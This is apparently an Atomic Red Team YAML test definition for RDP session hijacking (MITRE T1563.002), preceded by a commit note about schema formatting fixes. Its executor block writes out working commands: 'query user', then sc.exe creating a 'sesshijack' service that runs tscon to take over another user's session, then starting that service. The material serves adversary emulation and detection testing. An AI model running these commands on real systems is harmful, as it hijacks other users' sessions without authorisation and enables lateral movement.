Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
28 lines
1.0 KiB
YAML
28 lines
1.0 KiB
YAML
attack_technique: T1563.002
|
|
display_name: 'Remote Service Session Hijacking: RDP Hijacking'
|
|
atomic_tests:
|
|
- name: RDP hijacking
|
|
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
|
|
description: |
|
|
[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
Session_ID:
|
|
description: The ID of the session to which you want to connect
|
|
type: string
|
|
default: "1337"
|
|
Destination_ID:
|
|
description: Connect the session of another user to a different session
|
|
type: string
|
|
default: rdp-tcp#55
|
|
executor:
|
|
command: |
|
|
query user
|
|
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
|
|
net start sesshijack
|
|
cleanup_command: |
|
|
sc.exe delete sesshijack >nul 2>&1
|
|
name: command_prompt
|
|
elevation_required: true
|